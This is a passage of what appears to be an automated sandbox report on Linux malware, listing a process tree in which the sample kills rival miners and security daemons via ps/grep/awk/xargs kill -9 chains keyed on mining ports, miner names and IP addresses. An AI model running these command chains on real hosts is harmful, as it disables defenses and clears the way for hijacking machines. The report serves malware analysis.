2⤵
PID:1777

/bin/grep
grep :6666
2⤵
PID:1776

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1786

/bin/grep
grep -v -
2⤵
PID:1785

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1784

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1783

/bin/grep
grep :6665
2⤵
PID:1782

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1792

/bin/grep
grep -v -
2⤵
PID:1791

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1790

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1789

/bin/grep
grep :6667
2⤵
PID:1788

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1798

/bin/grep
grep -v -
2⤵
PID:1797

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1796

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1795

/bin/grep
grep :7777
2⤵
PID:1794

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1804

/bin/grep
grep -v -
2⤵
PID:1803

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1802

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1801

/bin/grep
grep :8444
2⤵
PID:1800

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1810

/bin/grep
grep -v -
2⤵
PID:1809

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1808

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1807

/bin/grep
grep :3347
2⤵
PID:1806

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1816

/bin/grep
grep -v -
2⤵
PID:1815

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1814

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1813

/bin/grep
grep :14444
2⤵
PID:1812

/bin/grep
grep -v -
2⤵
PID:1821

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1822

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1820

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1819

/bin/grep
grep :14433
2⤵
PID:1818

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1828

/bin/grep
grep -v -
2⤵
PID:1827

/usr/bin/awk
awk "-F[/]" "{print \$1}"
2⤵
PID:1826

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:1825

/bin/grep
grep :13531
2⤵
PID:1824

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1830

/bin/cat
cat /tmp/.X11-unix/01
2⤵
PID:1829

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1832

/bin/cat
cat /tmp/.X11-unix/11
2⤵
PID:1831

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1834

/bin/cat
cat /tmp/.X11-unix/22
2⤵
PID:1833

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1836

/bin/cat
cat /tmp/.pg_stat.0
2⤵
PID:1835

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1838

/bin/cat
cat /tmp/.pg_stat.1
2⤵
PID:1837

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1840

/bin/cat
cat /data/./oka.pid
2⤵
PID:1839

/usr/bin/pkill
pkill -f zsvc
2⤵
- Reads CPU attributes
PID:1841

/usr/bin/pkill
pkill -f pdefenderd
2⤵
PID:1842

/usr/bin/pkill
pkill -f updatecheckerd
2⤵
PID:1843

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1848

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1847

/bin/grep
grep -v grep
2⤵
PID:1846

/bin/grep
grep ./oka
2⤵
PID:1845

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1844

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1853

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1852

/bin/grep
grep -v grep
2⤵
PID:1851

/bin/grep
grep "postgres: autovacum"
2⤵
PID:1850

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1849

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1865

/bin/grep
grep -v kinsing
2⤵
PID:1863

/bin/grep
grep -v postgres
2⤵
PID:1861

/bin/grep
grep -v postgrey
2⤵
PID:1862

/bin/grep
grep -v proxymap
2⤵
PID:1860

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1864

/bin/grep
grep -v php-fpm
2⤵
PID:1859

/bin/grep
grep -v "("
2⤵
PID:1858

/bin/grep
grep -v "\\["
2⤵
PID:1857

/bin/grep
grep -v bin
2⤵
PID:1856

/usr/bin/awk
awk "length(\$1) == 8"
2⤵
PID:1855

/bin/ps
ps ax -o "command,pid" -www
2⤵
- Reads runtime system information
PID:1854

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1876

/usr/local/sbin/kill
kill -9 1274
3⤵
PID:1877

/usr/local/bin/kill
kill -9 1274
3⤵
PID:1877

/usr/sbin/kill
kill -9 1274
3⤵
PID:1877

/usr/bin/kill
kill -9 1274
3⤵
PID:1877

/sbin/kill
kill -9 1274
3⤵
PID:1877

/bin/kill
kill -9 1274
3⤵
PID:1877

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1875

/bin/grep
grep -v postgres
2⤵
PID:1873

/bin/grep
grep -v postgrey
2⤵
PID:1874

/bin/grep
grep -v proxymap
2⤵
PID:1872

/bin/grep
grep -v php-fpm
2⤵
PID:1871

/bin/grep
grep -v "("
2⤵
PID:1870

/bin/grep
grep -v "\\["
2⤵
PID:1869

/bin/grep
grep -v bin
2⤵
PID:1868

/usr/bin/awk
awk "length(\$1) == 16"
2⤵
PID:1867

/bin/ps
ps ax -o "command,pid" -www
2⤵
- Reads CPU attributes
PID:1866

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1888

/usr/bin/awk
awk "{print \$1}"
2⤵
PID:1887

/bin/grep
grep -v postgrey
2⤵
PID:1886

/bin/grep
grep -v postgres
2⤵
PID:1885

/bin/grep
grep -v proxymap
2⤵
PID:1884

/bin/grep
grep -v php-fpm
2⤵
PID:1883

/bin/grep
grep -v "("
2⤵
PID:1882

/bin/grep
grep -v "\\["
2⤵
PID:1881

/bin/grep
grep -v bin
2⤵
PID:1880

/usr/bin/awk
awk "length(\$5) == 8"
2⤵
PID:1879

/bin/ps
ps ax
2⤵
PID:1878

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1893

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1892

/bin/grep
grep /tmp/sscks
2⤵
PID:1891

/bin/grep
grep -v grep
2⤵
PID:1890

/bin/ps
ps aux
2⤵
PID:1889

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1898

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1897

/bin/grep
grep -v grep
2⤵
PID:1896

/bin/grep
grep "sleep 60"
2⤵
PID:1895

/bin/ps
ps aux
2⤵
PID:1894

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1903

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1902

/bin/grep
grep -v grep
2⤵
PID:1901

/bin/grep
grep ./crun
2⤵
PID:1900

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1899

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1908

/usr/bin/awk
awk "{if(\$3>80.0) print \$2}"
2⤵
PID:1907

/bin/grep
grep -v grep
2⤵
PID:1906

/bin/grep
grep -vw kdevtmpfsi
2⤵
PID:1905

/bin/ps
ps aux
2⤵
PID:1904

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1913

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1912

/bin/grep
grep :3333
2⤵
PID:1911

/bin/grep
grep -v grep
2⤵
PID:1910

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1909

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1918

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1917

/bin/grep
grep :5555
2⤵
PID:1916

/bin/grep
grep -v grep
2⤵
PID:1915

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1914

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1923

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1922

/bin/grep
grep "kworker -c\\"
2⤵
PID:1921

/bin/grep
grep -v grep
2⤵
PID:1920

/bin/ps
ps aux
2⤵
PID:1919

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1928

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1927

/bin/grep
grep log_
2⤵
PID:1926

/bin/grep
grep -v grep
2⤵
PID:1925

/bin/ps
ps aux
2⤵
PID:1924

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1933

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1932

/bin/grep
grep systemten
2⤵
PID:1931

/bin/grep
grep -v grep
2⤵
PID:1930

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1929

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1938

/usr/local/sbin/kill
kill -9 14
3⤵
PID:1939

/usr/local/bin/kill
kill -9 14
3⤵
PID:1939

/usr/sbin/kill
kill -9 14
3⤵
PID:1939

/usr/bin/kill
kill -9 14
3⤵
PID:1939

/sbin/kill
kill -9 14
3⤵
PID:1939

/bin/kill
kill -9 14
3⤵
PID:1939

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1937

/bin/grep
grep netns
2⤵
PID:1936

/bin/grep
grep -v grep
2⤵
PID:1935

/bin/ps
ps aux
2⤵
PID:1934

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1944

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1943

/bin/grep
grep voltuned
2⤵
PID:1942

/bin/grep
grep -v grep
2⤵
PID:1941

/bin/ps
ps aux
2⤵
PID:1940

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1949

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1948

/bin/grep
grep darwin
2⤵
PID:1947

/bin/grep
grep -v grep
2⤵
PID:1946

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:1945

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1954

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1953

/bin/grep
grep /tmp/dl
2⤵
PID:1952

/bin/grep
grep -v grep
2⤵
PID:1951

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1950

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1959

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1958

/bin/grep
grep /tmp/ddg
2⤵
PID:1957

/bin/grep
grep -v grep
2⤵
PID:1956

/bin/ps
ps aux
2⤵
PID:1955

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1964

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1963

/bin/grep
grep /tmp/pprt
2⤵
PID:1962

/bin/grep
grep -v grep
2⤵
PID:1961

/bin/ps
ps aux
2⤵
PID:1960

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1969

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1968

/bin/grep
grep /tmp/ppol
2⤵
PID:1967

/bin/grep
grep -v grep
2⤵
PID:1966

/bin/ps
ps aux
2⤵
PID:1965

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1974

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1973

/bin/grep
grep "/tmp/65ccE*"
2⤵
PID:1972

/bin/grep
grep -v grep
2⤵
PID:1971

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1970

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1979

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1978

/bin/grep
grep "/tmp/jmx*"
2⤵
PID:1977

/bin/grep
grep -v grep
2⤵
PID:1976

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1975

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1984

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1983

/bin/grep
grep "/tmp/2Ne80*"
2⤵
PID:1982

/bin/grep
grep -v grep
2⤵
PID:1981

/bin/ps
ps aux
2⤵
- Process Discovery
PID:1980

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:1989

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1988

/bin/grep
grep IOFoqIgyC0zmf2UR
2⤵
PID:1987

/bin/grep
grep -v grep
2⤵
PID:1986

/bin/ps
ps aux
2⤵
PID:1985

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1994

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1993

/bin/grep
grep 45.76.122.92
2⤵
PID:1992

/bin/grep
grep -v grep
2⤵
PID:1991

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:1990

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:1999

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:1998

/bin/grep
grep 51.38.191.178
2⤵
PID:1997

/bin/grep
grep -v grep
2⤵
PID:1996

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1995

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2004

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2003

/bin/grep
grep 51.15.56.161
2⤵
PID:2002

/bin/grep
grep -v grep
2⤵
PID:2001

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:2000

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2009

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2008

/bin/grep
grep 86s.jpg
2⤵
PID:2007

/bin/grep
grep -v grep
2⤵
PID:2006

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:2005

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2014

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2013

/bin/grep
grep aGTSGJJp
2⤵
PID:2012

/bin/grep
grep -v grep
2⤵
PID:2011

/bin/ps
ps aux
2⤵
PID:2010

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2019

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2018

/bin/grep
grep nMrfmnRa
2⤵
PID:2017

/bin/grep
grep -v grep
2⤵
PID:2016

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2015

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2024

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2023

/bin/grep
grep PuNY5tm2
2⤵
PID:2022

/bin/grep
grep -v grep
2⤵
PID:2021

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:2020

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2029

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2028

/bin/grep
grep I0r8Jyyt
2⤵
PID:2027

/bin/grep
grep -v grep
2⤵
PID:2026

/bin/ps
ps aux
2⤵
PID:2025

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2034

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2033

/bin/grep
grep AgdgACUD
2⤵
PID:2032

/bin/grep
grep -v grep
2⤵
PID:2031

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2030

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2039

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2038

/bin/grep
grep uiZvwxG8
2⤵
PID:2037

/bin/grep
grep -v grep
2⤵
PID:2036

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2035

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2044

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2043

/bin/grep
grep hahwNEdB
2⤵
PID:2042

/bin/grep
grep -v grep
2⤵
PID:2041

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2040

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2049

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2048

/bin/grep
grep BtwXn5qH
2⤵
PID:2047

/bin/grep
grep -v grep
2⤵
PID:2046

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:2045

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2054

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2053

/bin/grep
grep 3XEzey2T
2⤵
PID:2052

/bin/grep
grep -v grep
2⤵
PID:2051

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:2050

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2059

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2058

/bin/grep
grep t2tKrCSZ
2⤵
PID:2057

/bin/grep
grep -v grep
2⤵
PID:2056

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:2055

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2064

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2063

/bin/grep
grep HD7fcBgg
2⤵
PID:2062

/bin/grep
grep -v grep
2⤵
PID:2061

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2060

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2069

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2068

/bin/grep
grep zXcDajSs
2⤵
PID:2067

/bin/grep
grep -v grep
2⤵
PID:2066

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:2065

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2074

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2073

/bin/grep
grep 3lmigMo
2⤵
PID:2072

/bin/grep
grep -v grep
2⤵
PID:2071

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2070

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2079

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2078

/bin/grep
grep AkMK4A2
2⤵
PID:2077

/bin/grep
grep -v grep
2⤵
PID:2076

/bin/ps
ps aux
2⤵
PID:2075

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2084

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2083

/bin/grep
grep AJ2AkKe
2⤵
PID:2082

/bin/grep
grep -v grep
2⤵
PID:2081

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:2080

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2089

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2088

/bin/grep
grep HiPxCJRS
2⤵
- System Network Configuration Discovery
PID:2087

/bin/grep
grep -v grep
2⤵
PID:2086

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2085

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2094

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2093

/bin/grep
grep http_0xCC030
2⤵
PID:2092

/bin/grep
grep -v grep
2⤵
PID:2091

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2090

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2099

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2098

/bin/grep
grep http_0xCC031
2⤵
PID:2097

/bin/grep
grep -v grep
2⤵
PID:2096

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:2095

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2104

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2103

/bin/grep
grep http_0xCC032
2⤵
PID:2102

/bin/grep
grep -v grep
2⤵
PID:2101

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2100

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2109

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2108

/bin/grep
grep http_0xCC033
2⤵
PID:2107

/bin/grep
grep -v grep
2⤵
PID:2106

/bin/ps
ps aux
2⤵
PID:2105

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2114

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2113

/bin/grep
grep C4iLM4L
2⤵
PID:2112

/bin/grep
grep -v grep
2⤵
PID:2111

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2110

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2119

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2118

/bin/grep
grep aziplcr72qjhzvin
2⤵
- System Network Configuration Discovery
PID:2117

/bin/grep
grep -v grep
2⤵
PID:2116

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:2115

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2123

/usr/bin/awk
awk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"
2⤵
PID:2122

/bin/grep
grep -v grep
2⤵
PID:2121

/bin/ps
ps aux
2⤵
PID:2120

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2128

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2127

/bin/grep
grep /boot/vmlinuz
2⤵
PID:2126

/bin/grep
grep -v grep
2⤵
PID:2125

/bin/ps
ps aux
2⤵
PID:2124

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2133

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2132

/bin/grep
grep i4b503a52cc5
2⤵
PID:2131

/bin/grep
grep -v grep
2⤵
PID:2130

/bin/ps
ps aux
2⤵
PID:2129

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2138

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2137

/bin/grep
grep dgqtrcst23rtdi3ldqk322j2
2⤵
PID:2136

/bin/grep
grep -v grep
2⤵
PID:2135

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2134

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2143

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2142

/bin/grep
grep 2g0uv7npuhrlatd
2⤵
PID:2141

/bin/grep
grep -v grep
2⤵
PID:2140

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2139

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2148

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2147

/bin/grep
grep nqscheduler
2⤵
PID:2146

/bin/grep
grep -v grep
2⤵
PID:2145

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:2144

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2153

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2152

/bin/grep
grep rkebbwgqpl4npmm
2⤵
PID:2151

/bin/grep
grep -v grep
2⤵
PID:2150

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:2149

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2159

/usr/local/sbin/kill
kill -9 1521
3⤵
PID:2160

/usr/local/bin/kill
kill -9 1521
3⤵
PID:2160

/usr/sbin/kill
kill -9 1521
3⤵
PID:2160

/usr/bin/kill
kill -9 1521
3⤵
PID:2160

/sbin/kill
kill -9 1521
3⤵
PID:2160

/bin/kill
kill -9 1521
3⤵
- Reads CPU attributes
PID:2160

/usr/bin/awk
awk "\$3>10.0{print \$2}"
2⤵
PID:2158

/bin/grep
grep "]"
2⤵
PID:2157

/bin/grep
grep -v aux
2⤵
PID:2156

/bin/grep
grep -v grep
2⤵
PID:2155

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:2154

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2165

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2164

/bin/grep
grep 2fhtu70teuhtoh78jc5s
2⤵
PID:2163

/bin/grep
grep -v grep
2⤵
PID:2162

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:2161

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2170

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2169

/bin/grep
grep 0kwti6ut420t
2⤵
PID:2168

/bin/grep
grep -v grep
2⤵
PID:2167

/bin/ps
ps aux
2⤵
- Process Discovery
- Reads runtime system information
PID:2166

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2175

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2174

/bin/grep
grep 44ct7udt0patws3agkdfqnjm
2⤵
PID:2173

/bin/grep
grep -v grep
2⤵
PID:2172

/bin/ps
ps aux
2⤵
PID:2171

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2182

/usr/bin/awk
awk "length(\$11)>19{print \$2}"
2⤵
PID:2181

/bin/grep
grep -v _
2⤵
PID:2180

/bin/grep
grep -v -
2⤵
PID:2179

/bin/grep
grep -v /
2⤵
PID:2178

/bin/grep
grep -v grep
2⤵
PID:2177

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:2176

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2187

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2186

/bin/grep
grep "\\[^"
2⤵
PID:2185

/bin/grep
grep -v grep
2⤵
PID:2184

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:2183

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2192

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2191

/bin/grep
grep rsync
2⤵
PID:2190

/bin/grep
grep -v grep
2⤵
PID:2189

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:2188

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2197

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2196

/bin/grep
grep watchd0g
2⤵
PID:2195

/bin/grep
grep -v grep
2⤵
PID:2194

/bin/ps
ps aux
2⤵
- Reads runtime system information
PID:2193

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2202

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2201

/bin/egrep
egrep "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:2200

/usr/local/sbin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:2200

/usr/local/bin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:2200

/usr/sbin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:2200

/usr/bin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:2200

/sbin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:2200

/bin/grep
grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
2⤵
PID:2200

/bin/grep
grep -v grep
2⤵
PID:2199

/bin/ps
ps aux
2⤵
- Reads CPU attributes
PID:2198

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2207

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2206

/bin/grep
grep 158.69.133.18:8220
2⤵
PID:2205

/bin/grep
grep -v grep
2⤵
PID:2204

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2203

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2212

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2211

/bin/grep
grep /tmp/java
2⤵
PID:2210

/bin/grep
grep -v grep
2⤵
PID:2209

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Process Discovery
PID:2208

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2217

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2216

/bin/grep
grep gitee.com
2⤵
PID:2215

/bin/grep
grep -v grep
2⤵
PID:2214

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2213

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
PID:2222

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2221

/bin/grep
grep /tmp/java
2⤵
PID:2220

/bin/grep
grep -v grep
2⤵
PID:2219

/bin/ps
ps aux
2⤵
- Process Discovery
PID:2218

/usr/bin/xargs
xargs -I "%" kill -9 "%"
2⤵
- Attempts to change immutable files
PID:2227

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:2226

/bin/grep
grep 104.248.4.162
2⤵
PID:2225

/bin/grep
grep -v grep
2⤵
PID:2224

